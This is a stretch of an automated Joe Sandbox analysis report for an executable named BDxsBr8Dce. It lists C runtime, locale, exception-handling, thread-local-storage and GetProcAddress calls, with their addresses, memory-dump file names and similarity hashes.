                                                                                                            • FindCompleteObject.LIBCMT ref: 01105084
                                                                                                            • FindMITargetTypeInstance.LIBCMT ref: 011050BD
                                                                                                              • Part of subcall function 01104D23: PMDtoOffset.LIBCMT ref: 01104DB5
                                                                                                            • FindVITargetTypeInstance.LIBCMT ref: 011050C4
                                                                                                            • PMDtoOffset.LIBCMT ref: 011050D5
                                                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 011050FE
                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0110510C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$InstanceOffsetTargetType$CompleteException@8ObjectThrowstd::bad_exception::bad_exception
                                                                                                            • String ID: Bad dynamic_cast!
                                                                                                            • API String ID: 1565299582-2956939130
                                                                                                            • Opcode ID: 79612b810647181402f5d7a9e4a95074fc9e06e7d1779991be857c4839ba08f4
                                                                                                            • Instruction ID: 9e0afa87a1153785755b794c9f0854ab054c4ae2fdf12d5fe81e9d43964c3bd1
                                                                                                            • Opcode Fuzzy Hash: 79612b810647181402f5d7a9e4a95074fc9e06e7d1779991be857c4839ba08f4
                                                                                                            • Instruction Fuzzy Hash: 0D21E772E0030A9FDB1EEFA8CC84AAE7B69BF59714F114059F901A72C5DBB49901CF91
                                                                                                            APIs
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetFileVersionInfoSizeW), ref: 00F703A9
                                                                                                            • GetProcAddress.KERNEL32(?,VerQueryValueW), ref: 00F703E9
                                                                                                            • GetProcAddress.KERNEL32(?,GetFileVersionInfoW), ref: 00F70424
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc
                                                                                                            • String ID: GetFileVersionInfoSizeW$GetFileVersionInfoW$VerQueryValueW
                                                                                                            • API String ID: 190572456-981298171
                                                                                                            • Opcode ID: 6ec2d2b119ef716af3d697cf9fc36b119e2d106439f728e11c416820a0771b78
                                                                                                            • Instruction ID: 7c00cbcf8acf1c51b5aaa33a867be242622587cd4ce45c682a047d1a4b758000
                                                                                                            • Opcode Fuzzy Hash: 6ec2d2b119ef716af3d697cf9fc36b119e2d106439f728e11c416820a0771b78
                                                                                                            • Instruction Fuzzy Hash: 3671D271A08341DFD700DF24D850B6BBBE8AF99724F04892EF48897241EB34D908DBA3
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FE5680: TlsAlloc.KERNEL32(EA29BAA6,015D5CDC,?,011528FE,000000FF,00FE4F20,EA29BAA6,?,?,015D5CDC), ref: 00FE56F0
                                                                                                            • TlsGetValue.KERNEL32(EA29BAA6,?,?,015D5CDC), ref: 00FE4F26
                                                                                                            • TlsSetValue.KERNEL32(00000000,015D5CDC), ref: 00FE4F6F
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00FE4FB2
                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00FE4FF1
                                                                                                            • GetCurrentThread.KERNEL32 ref: 00FE4FF8
                                                                                                            • GetCurrentProcess.KERNEL32(00000000), ref: 00FE4FFF
                                                                                                            • DuplicateHandle.KERNEL32(00000000), ref: 00FE5006
                                                                                                              • Part of subcall function 0110379E: _malloc.LIBCMT ref: 011037B6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThreadValue$AllocDuplicateHandle_malloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 1274329885-0
                                                                                                            • Opcode ID: cb94a39f74838b7de2d40728e18cec7f749a1794fc1cb11165f5d35f75db7bf1
                                                                                                            • Instruction ID: e3f21d0c3f2c934456bf85ce34b31a985142dff2e7a125c74cb36194e146c27e
                                                                                                            • Opcode Fuzzy Hash: cb94a39f74838b7de2d40728e18cec7f749a1794fc1cb11165f5d35f75db7bf1
                                                                                                            • Instruction Fuzzy Hash: 9331E5B2E04685AFCB20DFB5E809B5EBBB5FB44B60F10022EE415D7290EB759900D7A1
                                                                                                            APIs
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0077294D
                                                                                                              • Part of subcall function 01102D36: __lock.LIBCMT ref: 01102D47
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00772973
                                                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 007729F7
                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00772A06
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00772A1D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: std::_$LockitLockit::_$Exception@8Facet_RegisterThrow__lockstd::bad_exception::bad_exception
                                                                                                            • String ID: bad cast
                                                                                                            • API String ID: 153433846-3145022300
                                                                                                            • Opcode ID: 389be4e1addf95cb76bdf13ba23dc1d6fd738839abf48ee1e77f17b94a209f0d
                                                                                                            • Instruction ID: d41404709a4b3c57efd38784a160a0b9d9cd22cf926991c6d9de896b2a101203
                                                                                                            • Opcode Fuzzy Hash: 389be4e1addf95cb76bdf13ba23dc1d6fd738839abf48ee1e77f17b94a209f0d
                                                                                                            • Instruction Fuzzy Hash: 9C3146719152019FCB36DF14D884A1AB3F4FB98764F06855DE8A9AB281E734FC0ACF91
                                                                                                            APIs
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0078337D
                                                                                                              • Part of subcall function 01102D36: __lock.LIBCMT ref: 01102D47
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 007833A3
                                                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 00783427
                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00783436
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0078344D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: std::_$LockitLockit::_$Exception@8Facet_RegisterThrow__lockstd::bad_exception::bad_exception
                                                                                                            • String ID: bad cast
                                                                                                            • API String ID: 153433846-3145022300
                                                                                                            • Opcode ID: efa8aa09808c6b101642e46d352a9652932c079d26dde3fe0dd59d1b628c46d4
                                                                                                            • Instruction ID: f1f642ddea3798b38e6ade3924c07a00ae58e66f540de8d25f20558fd8d9ef23
                                                                                                            • Opcode Fuzzy Hash: efa8aa09808c6b101642e46d352a9652932c079d26dde3fe0dd59d1b628c46d4
                                                                                                            • Instruction Fuzzy Hash: AE3106719442029FC726EF18D880A2AB7F4FB58B28F45455EEC969B280DB74ED09CB91
                                                                                                            APIs
                                                                                                            • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 007730B4
                                                                                                              • Part of subcall function 0110338D: _setlocale.LIBCMT ref: 011033A6
                                                                                                            • _free.LIBCMT ref: 007730C4
                                                                                                              • Part of subcall function 0110392F: HeapFree.KERNEL32(00000000,00000000,?,00F7BBA2,?,00B21028,?,00000002,00000004), ref: 01103943
                                                                                                              • Part of subcall function 0110392F: GetLastError.KERNEL32(?,?,00F7BBA2,?,00B21028,?,00000002,00000004), ref: 01103955
                                                                                                            • _free.LIBCMT ref: 007730DB
                                                                                                            • _free.LIBCMT ref: 007730F2
                                                                                                            • _free.LIBCMT ref: 00773109
                                                                                                            • _free.LIBCMT ref: 00773120
                                                                                                            • _free.LIBCMT ref: 00773137
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                                                            • String ID:
                                                                                                            • API String ID: 3515823920-0
                                                                                                            • Opcode ID: 5d1f48f34fab6a968611b61fd00c3b057a7dd4fa1296f2c6de4b353144b0cde8
                                                                                                            • Instruction ID: 97bd28c75aba40827b633695bc4a4193f3ecfc02697b5cb3d73a999cfa47f86e
                                                                                                            • Opcode Fuzzy Hash: 5d1f48f34fab6a968611b61fd00c3b057a7dd4fa1296f2c6de4b353144b0cde8
                                                                                                            • Instruction Fuzzy Hash: 5D01DEF0E00B055BEA35DE25D855B1772E86F10744F04892CD45B8B781EBB9E518CB96
                                                                                                            APIs
                                                                                                            • __init_pointers.LIBCMT ref: 0111557A
                                                                                                              • Part of subcall function 011092FE: EncodePointer.KERNEL32(00000000,?,0111557F,01106004,0158FED8,00000014), ref: 01109301
                                                                                                              • Part of subcall function 011092FE: __initp_misc_winsig.LIBCMT ref: 0110931C
                                                                                                              • Part of subcall function 011092FE: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0111240F
                                                                                                              • Part of subcall function 011092FE: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 01112423
                                                                                                              • Part of subcall function 011092FE: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 01112436
                                                                                                              • Part of subcall function 011092FE: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 01112449
                                                                                                              • Part of subcall function 011092FE: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0111245C
                                                                                                              • Part of subcall function 011092FE: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0111246F
                                                                                                              • Part of subcall function 011092FE: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 01112482
                                                                                                              • Part of subcall function 011092FE: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 01112495
                                                                                                              • Part of subcall function 011092FE: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 011124A8
                                                                                                              • Part of subcall function 011092FE: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 011124BB
                                                                                                              • Part of subcall function 011092FE: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 011124CE
                                                                                                              • Part of subcall function 011092FE: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 011124E1
                                                                                                              • Part of subcall function 011092FE: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 011124F4
                                                                                                              • Part of subcall function 011092FE: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 01112507
                                                                                                              • Part of subcall function 011092FE: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0111251A
                                                                                                              • Part of subcall function 011092FE: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0111252D
                                                                                                            • __mtinitlocks.LIBCMT ref: 0111557F
                                                                                                            • __mtterm.LIBCMT ref: 01115588
                                                                                                            • __calloc_crt.LIBCMT ref: 011155AD
                                                                                                            • __initptd.LIBCMT ref: 011155CF
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 011155D6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
                                                                                                            • String ID:
                                                                                                            • API String ID: 1593083391-0
                                                                                                            • Opcode ID: 1e36baf566efa69e48469ce1d381b5567c86fa7bb5d8ff6ebd75d864055b765d
                                                                                                            • Instruction ID: f8b8cb5901c17579443a4c542bf9d3da5bc909816d870e9b583339492feaac4a
                                                                                                            • Opcode Fuzzy Hash: 1e36baf566efa69e48469ce1d381b5567c86fa7bb5d8ff6ebd75d864055b765d
                                                                                                            • Instruction Fuzzy Hash: 4AF0F0326683525AE3FD76B83C0168EFA97CBA3638B20463AE564D40DCFF2080814641
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _memmove
                                                                                                            • String ID:
                                                                                                            • API String ID: 4104443479-0
                                                                                                            • Opcode ID: 334836ac93e049ffc3c736f23665280d6472f661ce45f53e0eb12c5f1c574589
                                                                                                            • Instruction ID: 37b237d65bc5cb2d06b820c3ece5bd200a304ccbd56b207ffbe39311025057a9
                                                                                                            • Opcode Fuzzy Hash: 334836ac93e049ffc3c736f23665280d6472f661ce45f53e0eb12c5f1c574589
                                                                                                            • Instruction Fuzzy Hash: EB515475600B06AFD715CF69DC40EA2F7F5FF48314F04466AEA9886A61E731F960CB80
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FE6540: GetCurrentThreadId.KERNEL32 ref: 00FE6563
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00FE575D
                                                                                                            • CloseHandle.KERNEL32(?,?,00000000,Function_009E2138,000000FF,00FE5017,FFFFFFFF,?), ref: 00FE576F
                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,Function_009E2138,000000FF,00FE5017,FFFFFFFF,?), ref: 00FE57AF
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00FE53F0,00000000,00000000,015D3B08), ref: 00FE57DB
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,Function_009E2138,000000FF,00FE5017,FFFFFFFF,?), ref: 00FE57E2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
